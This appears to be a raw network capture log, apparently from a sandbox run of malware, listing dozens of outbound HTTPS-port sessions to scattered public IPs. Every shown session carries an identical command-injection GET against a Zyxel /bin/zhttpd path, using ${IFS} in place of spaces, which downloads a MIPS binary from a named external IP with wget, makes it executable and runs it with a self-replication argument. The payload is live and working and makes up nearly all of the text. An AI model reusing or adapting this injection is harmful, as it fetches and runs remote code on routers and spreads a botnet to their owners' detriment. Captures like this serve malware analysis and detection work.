                                                Jan 12, 2024 18:24:49.172919035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7750192.168.2.133897825.52.177.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172967911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7751192.168.2.133509643.68.241.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.172993898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7752192.168.2.133660286.4.103.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173031092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7753192.168.2.133402434.126.128.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173084974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7754192.168.2.135794660.17.65.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173146009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7755192.168.2.1360396159.118.210.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173156977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7756192.168.2.135844465.158.205.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173197985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7757192.168.2.133399825.223.32.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173249006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7758192.168.2.1360924217.104.18.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173276901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7759192.168.2.135058635.178.17.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173326969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7760192.168.2.1334896108.159.181.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173358917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7761192.168.2.133312266.115.9.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173402071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7762192.168.2.1334388188.101.159.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173441887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7763192.168.2.13424165.19.219.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173505068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7764192.168.2.1340354153.82.98.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173507929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7765192.168.2.1335714119.35.34.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173572063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7766192.168.2.135112476.66.65.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173621893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7767192.168.2.1358258154.169.232.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173645020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7768192.168.2.133422696.138.238.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173685074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7769192.168.2.134325040.14.151.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173698902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7770192.168.2.1337962158.132.209.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173768044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7771192.168.2.134489290.77.139.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173804998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7772192.168.2.1343402159.252.57.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173842907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7773192.168.2.1349262114.134.162.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173911095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7774192.168.2.133996283.217.128.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173927069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7775192.168.2.134434276.102.21.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.173964977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7776192.168.2.135967259.118.163.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174002886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7777192.168.2.1354012197.16.156.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174051046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7778192.168.2.136030088.150.50.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174071074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7779192.168.2.1332786218.124.116.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174129009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7780192.168.2.134790432.216.235.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174175024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7781192.168.2.134977472.159.254.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174216032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7782192.168.2.1336200140.73.239.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174268961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7783192.168.2.1335426176.196.144.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174312115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7784192.168.2.1342102185.228.61.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174334049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7785192.168.2.1357888204.122.144.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174372911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7786192.168.2.134078827.16.86.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174421072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7787192.168.2.135181877.97.52.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174453020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7788192.168.2.135539457.255.115.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174473047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7789192.168.2.1354074199.164.52.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174524069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7790192.168.2.1339160161.254.252.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174551010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7791192.168.2.1359932202.241.16.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174591064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7792192.168.2.1348420203.64.203.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174649954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7793192.168.2.1337280187.53.133.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174679995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7794192.168.2.133341046.237.41.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174724102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7795192.168.2.1355656201.130.176.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174756050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7796192.168.2.1339656149.4.226.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174798965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7797192.168.2.134287824.161.186.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174839973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7798192.168.2.1339960137.109.218.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174902916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7799192.168.2.1351524203.87.156.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174931049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7800192.168.2.135127898.90.111.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174962044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7801192.168.2.1343566170.169.24.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.174999952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7802192.168.2.1332810190.168.154.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175021887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7803192.168.2.1339950176.167.216.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175062895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7804192.168.2.1338806155.103.54.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175102949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7805192.168.2.1349138150.22.54.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175146103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7806192.168.2.1343544134.14.13.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175173044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7807192.168.2.135773069.232.252.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175223112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7808192.168.2.1343100122.58.111.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175250053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7809192.168.2.1336492125.199.80.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175270081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7810192.168.2.135485079.113.219.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175323963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7811192.168.2.13428388.143.10.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.175374031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7812192.168.2.1352376110.197.54.244443
                                                TimestampBytes transferredDirectionData
